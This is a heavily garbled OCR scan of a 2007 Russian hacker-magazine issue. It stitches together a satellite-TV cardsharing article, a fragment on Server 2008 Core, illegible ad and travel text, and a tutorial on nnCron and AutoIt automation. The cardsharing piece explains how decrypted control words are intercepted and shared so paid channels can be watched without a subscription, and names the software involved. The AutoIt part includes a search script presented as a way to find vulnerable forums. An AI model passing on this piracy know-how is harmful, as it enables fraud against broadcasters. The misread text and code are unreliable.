значительной части рынка. Но Іпіеі без боя не сдается, и будет просто 
замечательно, если она начнет проталкивать І_іпих в массы, вкладывая 
деньги в его рекламу, поддержку, еіс. 

Но, какговорится, поживем — увидим. тг 



Как можно 
использовать 
Зегѵег 2008 Соге 

Асгіѵе ОігесСогу Эотат Зегѵісез, 

Асгіѵе ОігесГогу Іл§1і1ѵѵеі§1п БігесШгу Зегѵісез (АО ІЛ35), 

Бупатіс Нозі: Сопй^игагіоп Ргогосоі фНСР) сервер, 

БЫЗ-сервер, 

файловый сервер, 

сервер печати, 

Зі:геатіп§ МесИа Зегѵісез, 

ѴѴеЬ Зегѵег (ИЗ). 



► оз4 



ХАКЕР 11/107/07 





ь 



Повышенный срс* службы ѵѵтартдсннк пліт с тиерлотвлыиыші' юимвсдагораіви 



І ' НМИЙДИМЙИ0І6АИТТЕ 

ІЛіга ОигаЫе2 



іи іаіііііііві 



чм'іідс шрыыр руіадкіпорм ищі- ^ л- мжч- « ЭГК 



і 1 • Диийгі даЩГГЕ Ши СигрЫе 

Ч|тДдеЧ-''|^1Х-^й«^< | !?ри < П^Н-^Т'Ц>1 -ИХ 






* МО? Пчім Прурм гір&и дошл елей 



■ 



Тол нио технология С ЕС Л В УТЕ и Игл Оигййіе 
позволяет эффективно понизить температуру 
материнской платы и продлить срок службы коѵ ьютера. 
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СПУТНИКОВОЕ тѵ 
НА ХАЛЯВУ, 
ИЛИКАРДШАРИНГ 
НА ПАЛЬЦАХ 



СПУТНИКОВОЕ ТВ ЗА КОПЕИКИ 



Когда опытные люди говорят, что бесплатного НТВ+ не бывает, они говорят правду, 
но немного лукавят, потому что знают, что наладить просмотр любого платного провай- 
дера можно за сущие копейки. Как, например, тебе идея получить два десятка эксклю- 
зивных спутниковых каналов за 5 баксов в месяц? Ага, вижу, ты заинтересован! 



путниковое телевидение — что вообще это такое? Главное 
его отличие отэфирного телевидения заключается в том, 
что изображение через спутник передается не в аналого- 
вом, а в полностью цифровом виде. Для передачи данных в 
цифре существует специальное семейство стандартов — йѴВ РідіІаІѴісІео 
Вгоасісазбпд). В частности, для спутникового ТВ используется технология 
ОѴВ-5. Буква 5 в названии неслучайно и идетотанглийского слова заіеііііе, 
что означает«спутник». Два основных плюса цифры — идеальное качество 
картинки в высоком разрешении и возможность делать с данными все 
что угодно, а точнее, какугодно их шифровать. Помимо этого с появлени- 
ем ОѴВ-5 в цифровом потоке стало возможным вставлять управляющие 



команды и с их помощью управлять подписчиками: открывать для каждого 
клиента только оплаченный им перечень каналов или, наоборот, отключать 
его в случае неуплаты. 

Главным элементом взаимодействия междутелевизионным провайде- 
ром и обычным легальным подписчиком является карта доступа (она же 
смарт-карта], которая вставляется в ресивер. Внешне она очень похожа 
на обычную кредитную карту, но вместе стем представляет собой полно- 
ценный микрокомпьютер с процессором, памятью и встроенным програм- 
мным обеспечением. В задачи смарт-карты входитуправление приемом и 
декодирование пакета оплаченных каналов. Всю необходимую для этого 
информацию она получает прямо со спутника поуправляющему каналу. Та- 
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кой прием называется «Управление через эфир», или ОТА (Оѵег-ТЬе-Аіг). С 
его помощью можно загружать в карту новые ключи или давать команду на 
их самостоятельное внутреннее обновление (в зависимости от конкретной 
технологии]. Крометого, через эфир оченьудобно включать/выключать 
конкретные карточки задолжавших подписчиков, поскольку каждая смарт- 
карта имеетуникальный номер-адрес. 

После установки оборудования абонент должен выбрать интересующий его 
набор каналов и оплатить абонентскую плату. После этого происходит акти- 
визация смарт-карты, открытие доступа к оплаченным каналам и (довольно 
часто] привязка к конкретному приемному оборудованию как мера против 
клонирования карт. 

Программное обеспечение для смарт-карты разрабатывает и зашива- 
ет компания-вещатель. В свое время это вызвало большие трудности у 
производителей приемного оборудования: реализовать совместимость со 
всеми сразу было чисто физически невозможно. В качестве решения этой 
проблемы стали использовать специальное устройство — декодер САМ 
(Сопсіібопаі Ассезз Мосіиіе, модуль условного доступа), который либо встра- 
ивается в ресивер, либо подключается к нему по специальном СІ-порту. 
Именно в САМ в качестве ключа вставляется смарт-карта, обеспечиваю- 
щая доступ к пакету каналов, и именно САМ-модуль отвечаетза взаимо- 
действие спутника и смарт-карты. 

Принимая спутниковый сигнал, САМ-модуль транслирует карте всю 
служебную информацию, идущую в канале параллельно видеосигналу 
(аналогичнотелетексту]. На закрытых каналах в этой информации среди 
прочего есть и схема восстановления (криптопараметры) телесигнала. 

Эти криптопараметры зашифрованы, и именно для их расшифровки в 
смарт-карте есть ключи. Получив от САМ-модуля необходимую информа- 
цию, карта ее расшифровывает собственным процессором и возвращает 
назад. А САМ-модуль, который часто называют декодером, с помощью этой 
расшифрованной схемы восстанавливаеттелесигнал. САМ-модуль необ- 
ходим потому, что у смарт-карты недостаточно вычислительной мощности 
для самостоятельного расшифровывания видеоизображения. 

0 ХАЛЯВЫ НЕТ 

Одна из характерных черт платного телевидения — это достаточно боль- 
шое количество разнообразных систем шифрования, применяемых веща- 
тельными компаниями для тысячи спутниковых каналов. Среди наиболее 
популярных систем кодирования чаще всего фигурируют 5 Е С А/ МесІіадиагсІ 




Послеустановки плагина в РгодОѴВ, его можно вызывать через меню 
программы 

( ѵѵѵѵѵѵ.сапаІрІиБ-ІесбпоІодіез.сот ). Ігсіеіо ( ѵѵѵѵѵѵ.ігсіеіоассезз.сот ). Веіасгурі: 
( ѵѵѵѵѵѵ.ЬеІагезеагсЬ.сІе ). Сопах, Сгуріюѵѵогкз Кллл/ѵѵ.сгѵріюмогкз.согп ). Ѵіассезз, 
N 05/ѴісІеодиагсІ ( ѵѵѵѵѵѵ.псіз.согп ) и ЫадгаѴізіоп ( уууууу.падга.сот ). Практичес- 
ки все эти системы разработаны европейскими фирмами. Некоторые из них 
взломаны и доступны для просмотра при наличии свежих ключей, скачан- 
ных из инета, а другие — по-прежнему нет. К ним, в частности, относится 
Ѵіассезз 2.6, которую использует НТВ+ и многие другие «лакомые» ТВ- 
провайдеры. Сразу хочу сказать, что пиратского (и, естественно, бесплат- 
ного] НТВ+, как несколько лет назад, нет! И не будет! В компании не дураки 
работают, и использование кодировки, которую не могут сломать вотуже 
несколько лет, естественно, не случайно. И все-таки некоторые действия 
по экономии денегна абонентской плате вполне доступны. 

Первый вариант — это использование специального гаджета, который 
называется «кардсплиттер». Подходит для коллективного использования 
одной подписки, которая покупается вскладчину. Проплаченная карта 
вставляется в небольшой девайс с картоприемником, который полокалке 
транслирует необходимые для дешифровки данные подключенным к нему 
(обычно посредством ЕіЬегпеі] клиентам. Естественно, у подключившихся 
также должна быть специальная карта, которая обычно представляет собой 
модуль, подключаемый к ресиверу. Выгода налицо: платится одна абонент- 
ская плата вместо нескольких. 

Второй вариант — это так называемый «кардшаринг», о котором сегодня 
и пойдет речь. Владелец проплаченной карты транслирует поток обме- 
на информацией между картой и тюнером через интернет (либо другим 
способом), а заплатившие символическую абонентскую плату (обычно 5 
баксов) клиенты могут этот поток принимать через инети посылать в тюнер. 



ГДЕ ПОЛУЧИТЬ 
АККАУТ 
[ЛЯ 

РДТТТАРИНГА 



да 
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Сервисов, предоставляющих услугу кардшаринга, не просто много, а 
очень много. Достаточно набрать в Гугле «Сагбзііагіп^», и на экране тут 
же появится с десяток подходящих контор. Оплата как правило осущест- 
вляется электронным образом и полностью анонимно (владельцев сер- 
висов можно понять) . Более всего приветствуются ѴѴеЬтопеу, Яндекс. 
Деньги и прочие электронные системы платежей. Если ты доселе ими 
не пользовался, рекомендую попробовать. Благо для регистрации в той 
же Вебмани понадобится всего несколько минут, а пополнить кошелек 
можно практически через любой автомат для оплаты сотовой связи. 
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На что способны фанаты спутникового ТВ! 




Клиентская часть кардшаринга 



Сложность этого метода заключается в необходимости настройки ресивера 
или ОѴВ-карты на компьютере со стороны клиента. Это отпугивает многих 
новичков и дает заработать денежку многочисленным «установщикам» 
(серьезно рискующим получить за это по голове). Тем не менее в последнее 
время появилось много тюнеров с уже предустановленным пиратским ПО, 
что способствует распространению кардшаринга. Мы же погорим отом, как 
люди используют его на компьютере, но прежде — пара слов отом, почему 
эта технология в принципе работает. 



г КАК ЭТО ИСПОЛЬЗУЮТ 

Хочу обратить твое внимание, что кардшаринг — это довольно сомнитель- 
ный способ просмотра спутникового ТВ. Если ты действительно заинтере- 
сован в получении качественного сервиса, стоимость подписки на спутни- 
ковое ТВ не должна стать для тебя шокирующе громадной. Это уже давно не 
удел богатых, а вполне доступная штука. Поэтому прошу воспринимать эту 
информацию исключительно в ознакомительных целях, а для просмотра 
использовать официально купленную подписку. 



«— Какие каналы можно смотреть с помощью этого метода? 

— Абсолютно любые. Противодействия этому способу не существует. Если есть сервер, 
который раздает ключи для канала, значит этот канал можно смотреть» 



Н ЧТО ТАКОЕ КАРДШАРИНГ 

Для декодирования аудио/видеопотоков используются так называемые 
СЭА-ключи. Последовательность СЭА-ключей называется йесгур^ес! ѴѴогб 
(ЭѴѴ), которую можно получить, раскодировав последовательность Сгуріесі 
ѴѴогб (СѴѴ). Тут надо вспомнить о существовании управлящих команд, 
передаваемых по служебному каналу, которые называются электронными 
контрмерами, или ЕСМ (Еіесігопіс Соипіег Меазиге). С их помощью как 
раз и передаются изменяющиеся каждые 10-15 секунд криптопараметры 
сигнала, которые ранее мы называли СѴѴ, итоже в зашифрованном виде. 
Для декодирования применяется операционный ключ, который хранится 
в смарт-карте и также обновляется провайдером, но на порядок реже! Для 
нас это непринципиально. Получается, что раскодировать СѴѴ и получить 
последовательность йѴѴ можно только в том случае, если есть смарт-карта. 
Но! Большинство систем использует открытую передачу йѴѴ от смарт-карты 
в ресивер/САМ-модуль, а это означает... Это означает, что можно перехва- 
тывать уже раскодированные СБА-ключи (то есть последовательность йѴѴ) 
и пересылать их другим ресиверам/ОѴВ-ка ртам. Ате уже смогут беспрепят- 
ственно раскодировать поток и получить картинку, не имея смарт-карты и, 
конечно же, официальной подписки. Завладев ОѴѴ-последовательностью, 
клиент просто направляет ее в СБА-дешифратор, где происходит раскоди- 
рование видео- и аудиопотоков, а на выходе получается картинка зашиф- 
рованного канала. Сочная, красивая и при этом почти бесплатная! 

Выходит, что вся схема кардшаринга неизменно состоит из двух элементов: 
сервера и клиента. Сервер — это программное средство, которое пере- 
хватывает ОѴѴ-ключи и отправляет их по сети подключившимся клиентам. 
Клиенты (их может быть несколько) к этому серверу подключаются, забирают 
ключи, скармливают их дескремблеру и наслаждаются просмотром люби- 
мых каналов. Вот и все! 



И все-таки — какпрофи поднимают подключение кзбаге-серверу и получа- 
ют ключи для просмотра зашифрованной картинки? Для этого им требуется 
немногое: 

•ОѴВ-ресивер. Это можетбыть РСІ-карточка в компьютер (вроде БкуБіаг 1 
или 2) или полноценный аппаратный девайс. В последнем случае особой 
популярностью пользуются ресиверы ОгеаглВох ЮВох), построенные на 
базе ОС І_іпих. В Сети распространяется огромное количество пропатчен- 
ных прошивок. 

•Постоянное подключение к интернету для доступа кзбаге-серверу. 
Технология кардшаринга подразумевает, что ключи для декодирования 
поступают постоянно. 

•Аккаунт на сагсізегѵег-хосте, где некоторыми людьми установлен специ- 
альный софт. Такие серверы обычно располагаются за границей. 

Несмотря на то что аппаратные ресиверы становятся все более и более 
доступными, многие используют5куз1:аг2 — наиболее демократичный 
вариант. Такую карточку или аналог (любую программную ОѴВ-карту) можно 
купить в магазине за 1 -2тысячи рублей. В одном из номеров мы подробно 
рассказывали отом, как самостоятельно установить антенну на крыше и 
провести юстировку на спутник. Подход выглядит следующим образом: 

1 . Сначала с помощью онлайн-сервиса или программы (например, Баіеііііе 
Апіеппа Аіідптепі) для антенны рассчитывается угол места и азимут (ис- 
ходными данными служат координаты города) и производится ее пример- 
ная установка с помощью компаса. 

2. Далее человек на крыше начинает поступательно менять положение 
антенны, пытаясь найти спутник, а его приятель отслеживаетуровень сиг- 
нала на компьютере с помощью специальной утилиты РазіБаіРіпсіег ( ѵѵѵѵѵѵ. 
іазЕзаібпсІег.сот ). забив в нее параметры нужного транспондера (передаю- 
щей части спутника). 

3. Кактолько сигнал пойман, антенна фиксируется. 
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Добавление нового канала 



Лично я подключился к 
бесплатному сервису 
Триколор. ТѴ и меня все 
устраивает. Вроде... 



Лузер! :) Там же всего 10 
каналов, и самый интерес- 
ный — молодежно-патриоти- 
ческий телеканал «Звезда». 
У меня на крыше мотоподвес 
и 6 ночных каналов с разных 
спутников:). 




Таким образом, оборудование в принципе настраивается 
для спутникового приема независимо оттого, собирается ли 
человек использовать кардшаринг или нет. 

Щ ЧУДО-ПЛАГИНЫ 

В качестве программы для просмотра обычно используется 
РгодйѴВ (ѵѵѵѵѵѵ.ргоасІѵЬ.сот/гиБ/ ] написанная нашим соотечест- 
венником и практически ставшая стандартом де-факто . Никаких 
функций для приема пиратских ключей поумолчанию в ней, 
естественно, нет (и совершенноточно не будет!]. Реализация кард- 
шаринга полностью вынесена в отдельный модуль, поэтому стем 
же успехом люди используют и другие продукты. Многие, кпримеру, 
отдают предпочтение мощнейшему МуТЬеаІте, другие — АІШѴВ 
[\ллллл/.аИ:бѵЬ.го 1. третьи фанатеют отОѴВЛгеат [\ллллл/.сІѵЬсІгеат.ога 1. 
Улюбой программы есть функция «Сканировать транспонтер», 
осуществляющая поисктелевизионных каналов, как открытых, так 
и закрытых. Открытые каналы доступны для просмотра с самого 
начала, а вот для просмотра закрытых приходится погеморроиться. 
Если человек хочет использовать кардшаринг, ему требуется 
использовать специальноедополнение — плагин ѴѴіпСВС или 
другой аналогичный. Домашней страницыу них по понятным 



причинам нет, однако в Сети их найти совсем несложно. По 
сути, связка РгодОѴВ и ѴѴіпСЗС — это и есть клиентская часть 
для кардшаринга. В настройках плагина люди забивают 
параметры, полученные на кардшаринг-сервере, и получают 
доступ к просмотру закрытых каналов. В некоторых случаях, 
правда, возникаютпроблемы при переключение каналов, но 
практика показывает, что все решаемо. 

^ ПРОБЛЕМАИЛИНЕТ? 

В настоящих кардшаринг — это серьезная проблема для всех 
спутниковых провайдеров. В Сети существует просто огром- 
нейшее количество сервисов, предоставляющих подобную 
услугу, а на форумах, зачастую закрытых, люди активно делятся 
ключами друге другом. Особым интузиастам мало одного 
только пакета программ, поэтому вход идет несколько антенн, 
подключенных кресиверу через специальный 0і5ЕцС-пере- 
ключатель, или одна «тарелка», но установленная на мотопод- 
весе. С другой стороны, настроить кардшарингеможет далеко 
не каждый, а абонентская плата за обслуживание сильно 
упала, поэтому количество официальных подписчиковтолько 
растет, ц-ц 



/«ѵ 







> ѵѵагпіпд 

Помни: легальная 
подписка — это офи- 
циально купленная 
подписка. В любом 
другом случачеты 
нарушаешь закон и 
рискуешь свобо- 
дой. А это ведьтебе 
совсем не нужно, 
правда? 
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5ѴШІСАТЕ СОШ РАЯК & 0АМ6ВТЕВ РАИТ 

БШЭ Т?Ц утрд И Я № ІРП ПРАКТИЧЕСКИ ' но нотг п 

но члрЛьЭ и нЕ дѵмдл ЭакАнЧйапі поэтому из П! жіікуоі: іі: я 

ПРОДОЛЖАЛ >ИМА1Ь ГѴРНг ПО СЕВЕРУ КВЕБЕКА НАНЫНАІЖЬ 
-Ы2ЙАИ ТЕР'- РДЕЯ ГЛ'ЯЕ ЗААТ МЧАЛАСЬ 0 ГОМ НТ06Ы ОШИІЬСР 
ПО ВСЕ?.1 САМЫМ ДЛИН-^ М ПЕРИЛАМ, ИГОРЬ Е ТОГЬКО МОЖНО БЫЛО 
НАШИ ВЫБИРАЛИ ГЖСТНИЦЬ ДГ ИННОЮ 60ЛЕЕ та огулен ЕЛ СТИЛЬ 
■: АНАДСКНЙ, Т Е БЕЗ ЮНКЕРА СЛАЙД КОТОРЫЙ БЫ ВИДИТЕ нА 
ФОТОГ РАФИИ ИЕ БЪ : Л 0СС-5Е НПО ДГ НЕ- ИЫЧ НО ЗАТО БЬ Л ІЕКНИ ч ЕСКИ 

сложным - сначала небольшой спуск затем очень длинный 

Г ОРЛЭОНТАЛЬНЫИ у* ІлС ТОК ПОСЛЕ КО'ОРО го пг РИЛА (НОВА КГУТО 
ШГИ ВНИЗ ЬСЕ ЭТО НАЧИНАЛОСЬ С ПЛОСКО: 1 . ПЛОЩАДКИ НА ПАРКОВКЕ 
ИРЛ'ДЧН ы 11П( ЕРЕДНО ганшннпп ДРѴ ДРѴ'Л : мамоцьк! 
АВТОМОБИЛЯ ЧТОБЫ Э*М>Ы'Н*Ъ НА РЭЙЛ. 
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он все 



сделает сам! 



втоматизируем любые процессы 



на компьютере 



Несмотря на то что многие вещи можно 
сделать проще или вообще автоматизиро- 
вать, мы упорно продолжаем усложнять 
себе жизнь, по старинке выполняя все 
вручную. Только представь, сколько эко- 
номилось бы времени, если бы компьютер 
делал все сам и лишь иногда запрашивал 
у нас помощи. Как оказывается, наладить 
автоматику реально практически для чего 
угодно! 



акни крути, но у каждого есть то, что можно автоматизировать. 
Но даже не смотря на то что некоторые моменты невероятно 
назойливые.ты откладываешь решение проблемы в долгий 
ящики со временем просто привыкаешь к ним. Вот, напри- 
мер, для того чтобы забрать почту из Оиііоок, подключившисьудаленно к 
ЕхсЬапде-серверу, приходится каждый раз вводить свой логин и пароль во 
всплывающем окошке. Да еще и добавлять название домена перед именем 
пользователя — это до кучи. Почему нет возможности сохранить его раз и 
навсегда, я долгое время не задумывался и упорно продолжал вводить эти 
данные вручную... ровно до тех пор, пока мне это окончательно не надоело. 

г ДОЛОЙ СТАНДАРТНЫЙ ПЛАНИРОВЩИК! 

Впрочем, отложим пока мои заморочки с Оиііоок’ом и обратимся кочевид- 
ному инструменту для автоматического выполнения каких-либо действий 
— планировщику задач. Конечно, при большом желании приложение, про- 
цесс или на худой конец ВАТ-файл с последовательностью команд можно 



по расписанию выполнить и через стандартнуютулзу Винды. Но в том-то 
и проблема, что только... выполнить. Ни шагу в сторону: только временные 
параметры, исполняемый файл и параметры для запуска — все. О каком 
решении задач может идти речь, если стандартный планировщик Винды 
даже не в состоянии выгрузить приложение по расписанию? Мало этого, 
для выполнения любой задачи нужно обязательно ввести имя пользовате- 
ля (с правами которого она будет выполняться) и пароль, причем даже в том 
случае, если его нет! Поэтомухочешьлитытого или нет, но парольдля поль- 
зователя тебе придется поставить обязательно. Ну или навсегда забыть 
о стандартном планировщике, установив замечательную утилиту ппСгоп 
( ѵѵѵѵѵѵ.ппсгоп.ги ). Вотлишь малая часть того, что предлагает эта программа: 

• запускать произвольные программы каксервисы; 

• запускать задачи «отимени»указанных юзеров; 

• отслеживать и перезапускать просроченные задачи и напоминалки; 

• выключать или «усыплять» компьютер в заданное время, «будить» ком- 
пьютер, чтобы запустить задачу; 
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Эта программа преобразуетлюбой скрипт в самостоятельное приложение 



Пример графической оболочки, созданной Аиіоіі 




• отображать, скрывать, закрывать, убивать, сворачивать, разворачивать и 
прятать в системный трей заданные окна, добавлять втрей произвольные 
иконки; 

• менять размер и местоположение окон, а также варьировать их прозрач- 
ность; 

• выводить на экран и в лог-файл любые сообщения, в том числе и запросы 
на выполнение указанных действий; 

• работать с клипбордом, файлами и реестром; 

• эмулировать клавиатурный ввод и операции с мышкой; 

• синхронизироватьсистемное время; 

• присваивать процессамуказанный приоритети прерывать работулюбых 
запущенных процессов. 

Время выполнения заданий устанавливается с помощью сгопіаб-файла, 
а действия описываются на специальном скриптовом языке РогіЫ Разбе- 
ремся с ними по порядку. 

г ЧТО ТАКОЕ СВОЫТАВ-ФАЙЛ 

Сгоп — как известно, стандартный планировщик никсов, который считыва- 
ет параметры заданий из специального файла сгопіаб и работает как часы, 
за что и уважается многотысячной армией пользователей *піх-систем. 
Файл сгопіаб, разумеется, имеет строго определенный формат, оченьдос- 
тупный и удобный, и именно его использует для своей работы наш ппСгоп. 
Традиционный (унаследованный из мира ІЛ N IX) сгоп-форматсостоитиз 
пяти полей, разделенных пробелами. Его и рассмотрим: 

<Минуты> <Часы> <Дни_месяца> <Месяцы> <Дни_недели> 

Любое из пяти полей может содержать символ «*» в качестве значения. Он 
указываетна полный диапазон возможныхзначений, например каждая 
минута, каждый час ит.д. Любое из полей может содержать списокзначе- 
ний, разделенных запятыми (например, 1 ,3,7), или интервал (поддиапазон) 
значений, задаваемый дефисом (например, 1-5). После звездочки (*) или 
интервала с помощью символа «/«указывается шагзначений. Напри- 
мер, 0-23/2 может использоваться в поле «Часы» для указания того, что 
действие должно происходить каждые два часа. Чтобы стало окончательно 
ясно, приведу несколько примеров с пояснениями: 

•******_ выполнение каждую минуту; 

•45 1776** — каждый год 7 июня в 17:45; 

• 091-7*1 * — первый понедельник каждого месяца в 9 утра. 

^ ПИШЕМ СВОЮ ПЕРВУЮ ЗАДАЧУ 

Любая работа, которую будет выполнять ппСгоп, задается с помощью 
специальной синтаксической конструкции — задачи. В рамках задачи 
описывается каксама работа (запуск программ, операции с файлами, 



демонстрация сообщений на экране ит.д.), так и разнообразные условия, 
при соблюдении которых эта работа должна быть произведена (время, 
наличие/отсутствие указанных файлов, наличие/отсутствие носителя в 
дисководе ит.д.). В общем случае простая задача выглядит следующим 
образом: 

# ( имя_задач 

Тіше : спецификатор времени в формате сгоп 
АсЬіоп: описание выполняемых действий 

)# 

Следовательно, для того чтобы, например, запускать приложение каждые 
1 5 минут по рабочим дням с обычным приоритетом, необходимо написать 
такой скриптик: 

# ( 1зб_базк 

Тіше: */15 * * * 1-5 * 

ЗЪомМіпітізесі ЫогшаІРгіогіЦу 

АсЕіоп: 

ЗТАКТ-АРР: С : \Ргодгаш РИезМпРегпеЕ Ехр1огег\ 

поЕерасІ. ехе 

# 

Впрочем, прописывать что-либо руками необязательно и можно 
наладить запуск приложения через 61Л-оболочку. Но в этом случае 
придется ограничиться выполнением задач по расписанию. Зато 
использование скриптов позволяет задействовать в качестве условия 
буквально любое событие. ппСгоп способен отслеживать файлы, 
флаги, окна, процессы, движения мыши, время простоя компьютера, 
клавиатурные шорткаты, выход в онлайн/оффлайн, появление диска в 
драйве, наличие хоста в сети (пинг), изменение удаленного ресурса по 
Ьир-протоколу, количество свободного места на диске, загруженность 
оперативной памяти и многое другое... Специально, чтобы точно не 
потерять никакие данные, при при достижении критического уровня 
заряда аккумулятора у меня создается бэкап всех важных данных. 
Отслеживается такое событие так же, как и все остальные. Приведу 
пример: 

# ( ЦезС_Ьаи:егу 

Маб сЪВаб б егу Ьом 

АсЕіоп: 

МЗС: "Создаю бэкап" 

\ действия по выполнению бэкапа 

)# 
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Редактор Зсііе идеально подходит для написания скриптов Аиіоіі: 




Надискеты найдешь 
полные версии 
АиІоИ:, ппСгоп, 
полезные сниппеты, 
скрипты и примеры 
использования 
этих замечательных 
программ. 




> Ііпкз 

ѴізІитЫег [ Ьир:// 

ІесЬісІіоіз.пеі/аиіоП:- 

зсгірІіз/ѵізШтЫег ) 

— программа, анало- 
гичная Ые^зІитЫег'у, 
разработанная для 
Ѵізіа, — один из 
многочисленных 
примеров того, что с 
помощью Аиіо II; можно 
создать практически 
любое приложение. 

ЬирѴЛесЫсІіоіз. 

пеі/аиіоіі-зсгіріз 

— хорошие скрипты 
для Аиіоіі. 

ѵѵѵѵѵѵ.ппсгоп.ги — офи- 
циальный сайтппСгоп. 



Разрешение на выполнение действий можно запросить у 
пользователя. 

УДАЛЯЕМ ВСЕ ПРОЦЕССЫ С ИМЕНЕМ ІЕХРЮВЕ.ЕХЕ 

# ( кі11_а11_ргосезз 

\ выводим запрос и прерываем по очереди 
\ все найденные процессы «ИЭксплорера» 
ЫоАсДіѵе 
АсДіоп: 

РОК-РКОСЗ: " іехріоге . ехе" 

ОПЕКУ: "Прервать процесс %РОШБ-РКОС%? " 
ІР 

КІЬЬ: "%ЕОШВ-РІБ%" 

ТНЕИ 

; РОК-РКОСЗ 

)# 

Эти примеры я привел лишь для того, чтобы ты понял, насколь- 
ко удобно и быстро можно создавать практически любые 
сценарии и реагировать на самые незначительные события в 
системе. Ксожалению, в рамках статьи я не смогу обозначить 
даже малую часть всего того, что еще возможно реализовать 
с помощью ппСгоп. Но зато программа поставляется с отлич- 
нейшей документацией с кучей примеров на русском языке. 
Замечу только, что в ппСгоп встроено несколько дополни- 
тельных инструментов, которые еще больше расширяютего 
возможности (читай сноску]. 

0 ЭМУЛИРУЕМ РАБОТУ ПОЛЬЗОВАТЕЛЯ 

Несмотря на то что ппСгоп предоставляет несравнимо боль- 
шие возможности, чем просто планировщикзадач, я всеже 
использую его исключительно для автоматизации строго оп- 
ределенных последовательностей действий. По расписанию 
или же в случае наступления заданных событий. И не потому, 
что он справляется со всем остальным (например, эмуляцией 
присутствия пользователя) хуже, просто для остальных целей 
мне больше приглянулся другой, западный и никак не менее 
мощный инструмент АиІоІТ 3 ( ѵуѵѵѵѵ.аиІ:оИ:5сгір1.сот/аи1ой:3 ]. 
Этотпродуктспециально заточен под ту работу, которую ты 
могбы выполнить сам, но нехочешь, поскольку ее легко 
автоматизировать. Искусственное присутствие пользователя 
описывается с помощью простого языка сценариев, похожего 
на ВА5ІС. Что с его помощью можно сделать? Да все что угод- 
но: эмулировать ввод любых последовательностей клавиш, 



движений мышки, манипуляции с окнами и какими-либо еще 
элементами Винды. Но самое прикольное — это то, что АікоІТ 
3 позволяет создавать оболочки для управления хозяйством! 
Скажем, утебя есть три утилиты, которыеты последовательно 
используешь для оцифровки БѴО. Забудь о том, что их нужно 
запускать вручную и вводить для каждой из них параметры. 
Благодаря АиІоІТ ты за часок сможешь составить графическую 
оболочку для управления всеми тремя сразу! 

г ПРИМЕРЫ СКРИПТОВ 

Как выглядят скрипты? Как и в случае с ппСгоп, я не буду 
приводить описание синтаксиса и особенности, тем более что 
это практически чистый Ѵізиаі Вазіс. Вот, например, простой 
скрипт для того, чтобы проверить, запущено ли какое-либо 
приложение: 

$РгосеззЫате = "ЫоДерасІ. ехе" 

II РгосеззЕхізДз ( $Ргосе8зЫате) Ткеп 

МздВох ( 0 , "Киппіпд" , $РгосеззМате & " із 
гиппіпд . " ) 

Еізе 

МздВох ( 0 , "ЫоД Киппіпд" , $РгосеззКаше & " із 
поД гиппіпд . " ) 

Епйіб 

В зависимости от результата проверки выполняется 
определенное действие. В данном случае происхо- 
дит вы вод информационного окна. Запиши его в файл 
РгосеззРиппіпд.аиЗ и запусти с помощью АиІоІТ, чтобы 
посмотреть на то, что получится. Вот здесь можно 
ознакомиться с использованием наиболее типичных 
конструкций скриптов: ѵѵѵѵѵѵ.сІаіІѵсироЙесб.сот/иБе^иІ- 
аиіоіі-5сгірЦеі5 . 

Я ПОДКЛЮЧАЕМ ГОТОВЫЕ БИБЛИОТЕКИ 

Возможность использования ВАБІС-скриптов даетбольшой 
простор для действий, но писать некоторые вещи с нуля очень 
глупо. Многое уже сделано до тебя, и, прежде чем приступать 
креализации своей гениальной идеи, посмотри, не входит 
ли она в это число. Основным источником скриптов (ІЮР, или 
Озег ОеЛпесІ Рипсбопз) является форум разработчика про- 
граммы, а также спеииальныйѵѵікі-ресѵрс ѵѵѵѵѵѵ.аиіоіізсгірі. 
сотАл/ікі/іпбех.рЬр?бие=ЦРР Ызк 
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Рассмотрим простой пример. Тебе нужно заходить на ту или 
иную веб-станичку, отправлять через форму какие-то данные 
и обрабатывать результат. Допустим, ты ищешь уязвимые 
форумы по ключевым словам через боодіе. Так вотты сэконо- 
мишь массу времени, если возьмешь сторонние заготовки для 
работы с НТТР [ ѵѵѵѵѵѵ.сІаі[ѵсиро^есЬ.сот/?раае ісІ=86 ]. 

#іпс1ис!е <НТТР.аиЗ> 

$Ьоз1: = "ѵллтѵ/. доодіе . сот" 

$раде = "/зеагсЪ" 

$ѵагв = "Ы=еп&1:аЬ=т&д=" 

$зеагсЫ:егт = "ЬЬРогшп" 

$иг1 = $раде&" ?"&_НТТРЕпсосІеЗі:гіпд($ѵагз&:$зе 
агсЬзбгіпд) 

$зоскеС = _НТТРСоппесР ($1іозЬ) 

$деР = _НТТРСеР ( $1іозР , $шг1 , $зоске1: ) 

$гесѵ = _НТТРКеасі ( $зоскеі: , 1 ) 

СопзоІеМг Ше ( " БаСа гесеіѵей : " &@СРЬЕ$гесѵ [ 4 ] &@ 
СЕБЕ) 

Заготовки — это замечательно, но для еще большего удоб- 
ства рекомендую использовать редактор с подсветкой 
синтаксиса Аиіоіі. Наибольшей популярностью пользу- 
ется ЗсіТе ( ѵѵѵѵѵѵ.аиІоіІзсгірІ.сот/аіЛоііЗ/зсііе/ ). который 
также умеет проверять правильность кода и приводить его 
в порядок. 

Примечательно, что любой скрипт легко скомпилировать 
в независимое зіапсіаіюпе-приложение, которое можно 
запустить на любом компьютере (даже без установленно- 
го Аіііоіі). Если кликнуть по любому а иЗ-скр и пту правой 
кнопкой мыши, то среди прочих пунктов меню будет нужный 
— Сотрііе Бсгірі. Если требуется не просто создать готовое 
приложение, но и задать для него некоторые параметры 
(например, установить для него иконку или добавить воз- 
можность обратной декомпиляции), существует специаль- 
ная утилита: «Пуск -> АиіоН: ѵЗ -> Бсгірі СотріІег\Сопѵегі 
.аиЗ Іо .ехе». 

г ПРИМЕРАВТОМАТИЗАЦИИ ПРИЛОЖЕНИЯ 

Перейдем к самому главному. Как эмулировать дейст- 
вия пользователя в конкретных приложениях? Разберем 
пример, предложенный разработчиками. Пусть наш скрипт 
будет самостоятельно открывать блокнот, вводить там 
некоторый текст, после чего закрывать программу без 
сохранения изменений. Обычным планировщикам и уж тем 
более стандартным средствам Винды подобное не под силу, 
в отличие отАиіоІІ. 

Создаем с помощью ЗсіТе новый файл и называем его, скажем, 
поіераб.аиЗ. Первое действие — запуск программы. Для этого 
необходимо вызвать команду гип и в качестве аргумента ука- 
зать название исполняемого файла программы. Итак, первая 
строчка нашего скрипта: 

Кип ( " поРерасі . ехе " ) 

Следующий пункт — скрипт должен дождаться, когда 
откроется и станет активным окно приложения. Для этого 
предусмотрена функция ѴѴіпѴѴаііАсііѵе, которой в качестве 
параметра необходимо передать точное название окна и 
